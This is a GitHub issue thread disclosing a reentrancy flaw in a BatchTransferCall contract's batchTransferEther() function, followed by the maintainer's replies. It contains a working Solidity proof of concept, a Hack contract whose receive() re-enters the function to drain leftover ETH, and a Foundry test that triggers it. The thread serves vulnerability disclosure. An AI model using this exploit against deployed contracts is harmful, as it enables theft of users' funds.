### ISSUE TITLE
`BatchTransferCall:batchTransferEther()` can reentry 

### ISSUE THREAD

**Issue by lxhyl** [tokenInsight/coin-tools#1]
`batchTransferEther()` function L31-34 handle unused ETH send back to msg.sender. But if one of recipient is bad guy. He can reentry BatchTransferCall contract to hack this part ETH

## PoC && foundry Test

```solidity
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.13;

import "forge-std/Test.sol";
import {BatchTransferCall} from "../src/BatchTransfer.sol";

contract Hack {
    receive() external payable {
        if(msg.sender.balance == 0){
           return;
        }
        address payable[] memory recipients = new address payable[](1);
        recipients[0] = payable(address(this));
        uint256[] memory amounts = new uint256[](1);
        amounts[0] = msg.sender.balance;

        console.log("balance before hack", address(this).balance);
        BatchTransferCall(msg.sender).batchTransferEther(recipients,amounts);
        console.log("balance after hack", address(this).balance);
    }
}

contract BatchTransferTest is Test {
    BatchTransferCall public batchTransferCall;
    address hacker;
    function setUp() public {
        batchTransferCall = new BatchTransferCall();
        hacker = address(new Hack());
    }

    function testHack() public {
        address payable[] memory recipients = new address payable[](3);
        recipients[0] = payable(address(1));
        recipients[1] = payable(address(2));
        recipients[2] = payable(hacker);
        uint256[] memory amounts = new uint256[](3);
        amounts[0] = 1 ether;
        amounts[1] = 1 ether;
        amounts[2] = 1 ether;
        
        batchTransferCall.batchTransferEther{value: 4 ether}(recipients, amounts);
    }
}
```

**Comment by fxsjy** [comment]
Thank you for raising this concern. We appreciate your vigilance and would like to clarify that the BatchTransferCall contract has only been deployed on the zksync era, utilizing msg.sender.call due to the unique characteristics of this chain (https://era.zksync.io/docs/reference/architecture/differences-with-ethereum.html#using-call-over-send-or-transfer). This risk is not present on other chains. Furthermore, when the front-end interacts with the contract, the total amount designated for transfer is equal to the sum of the individual amounts to be received, leaving no residual balance. This issue would only arise if a sender were to bypass our front-end and directly call the contract. We have previously considered this scenario, but determined that implementing balance verification and reentrancy prevention within the contract would lead to increased gas consumption, and ultimately deemed it not essential.

**Comment by lxhyl** [comment]
The robustness of the contract is the most important, and the front end is unreliable. Do not change this is your business, I believe you should be a comprehensive consideration, I just happened to see and out of professional habit reported the problem.

**Comment by fxsjy** [comment]
Thank you again for taking the time to uncover these issues. We are considering updating and optimizing the contracts deployed on the zkSync Era. Our goal is to create an improved version that offers a solution with low gas consumption, straightforward and comprehensible code, along with robust security.
